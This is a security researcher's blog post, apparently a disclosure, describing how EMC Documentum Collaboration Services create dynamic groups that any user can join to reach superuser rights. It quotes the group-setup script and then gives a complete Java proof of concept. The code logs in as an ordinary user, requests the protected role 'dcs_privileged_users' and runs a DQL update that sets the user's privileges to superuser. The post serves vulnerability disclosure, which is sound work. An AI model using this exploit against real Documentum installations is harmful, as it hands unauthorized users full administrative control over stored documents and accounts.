God bless EMC. Part III

In November 2013 I had noted, that it’s not a good idea to give access to API Tester component in WDK applications to non-privileged users due to following reasons:

In latest wdk patches EMC restricted access to API Tester component, and now only superusers is able to use it:

But I completely missed a fact, that Collaboration Services (which are installed by default) create a lot of dynamic non-protected groups:

Call UpdatePrivGroup( "dce_room_creator", "dm_create_group" )
Call UpdatePrivGroup( "dce_create_room_groups", "dm_create_group" )
Call UpdatePrivGroup( "dce_user_manager", "dm_create_user" )
Call UpdatePrivGroup( "dce_user_manager", "dm_create_cabinet" )
Call UpdatePrivGroup( "dce_datatable_creator", "dm_create_type" )
Call UpdatePrivGroup( "dcs_privileged_users", "dm_superusers" )

Call AddGroupToRole("dce_create_room_groups", "dm_world" )
Call AddGroupToRole("dce_datatable_creator", "dm_world" )
Call AddGroupToRole("dcs_privileged_users", "dm_world" )

Call AddAttributeValueToRole( "dce_datatable_creator", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_datatable_creator", "is_module_only", "T" )
Call AddAttributeValueToRole( "dce_datatable_creator", "group_class", "module role" )

Call AddAttributeValueToRole( "dcs_privileged_users", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dcs_privileged_users", "is_module_only", "T" )
Call AddAttributeValueToRole( "dcs_privileged_users", "group_class", "module role" )

Call AddAttributeValueToRole( "dce_room_creator", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_room_creator", "is_module_only", "T" )

Call AddAttributeValueToRole( "dce_create_room_groups", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_create_room_groups", "is_module_only", "T" )
Call AddAttributeValueToRole("dce_create_room_groups", "group_class", "module role")

Call AddAttributeValueToRole( "dce_user_manager", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_user_manager", "is_module_only", "T" )

Call AddGroupAdminToGroup( "dce_create_room_groups", "dce_room_creator" )
Call AddGroupAdminToGroup( "dce_hidden_users", "dce_user_manager" )

This means that in previous releases of WDK applications any user is able to escalate privileges using API Tester component and, moreover, even now if user is able to connect to content server directly he is also able to escalate privileges:

package com.documentum.fc.client.security.impl;

import static java.lang.System.out;

import com.documentum.fc.client.DfClient;
import com.documentum.fc.client.IDfCollection;
import com.documentum.fc.client.IDfSession;
import com.documentum.fc.client.IDfSessionManager;
import com.documentum.fc.common.DfId;
import com.documentum.fc.common.DfList;
import com.documentum.fc.common.DfLoginInfo;
import com.documentum.fc.common.IDfList;
import com.documentum.fc.common.IDfLoginInfo;

public class Test {

    public static void main(String argv[]) throws Exception {
        String docbase = argv[0];
        String username = argv[1];
        String password = argv[2];
        String domain = null;
        if (argv.length == 4) {
            domain = argv[3];
        }

        IDfSessionManager sessionManager = new DfClient().newSessionManager();
        IDfLoginInfo loginInfo = new DfLoginInfo(username, password);
        if (domain != null) {
            loginInfo.setDomain(domain);
        }
        sessionManager.setIdentity(docbase, loginInfo);
        out.println("Connecting to docbase '" + docbase + "' as '" + username
                + "'");
        IDfSession session = sessionManager.getSession(docbase);
        out.println("Connected");
        IDfList arguments = new DfList(new String[] {"QUERY",
            "__REQUESTED_PROTECTED_ROLES", });
        IDfList types = new DfList(new String[] {"S", "S", });
        IDfList values = new DfList(
                new String[] {
                    "update dm_user object set user_privileges=16 where user_name=USER",
                    "dcs_privileged_users", });
        IDfCollection collection = session.apply(DfId.DF_NULLID_STR,
                "EXEC", arguments, types, values);
        if (collection != null && collection.next()) {
            out.println(collection.dump());
        }
        if (collection != null) {
            collection.close();
        }
    }
}

Update

On March 3rd, 2014 EMC announced a fix for taskspace (actually they just restricted access to API Tester), suggested workaround brings me a lot of fun: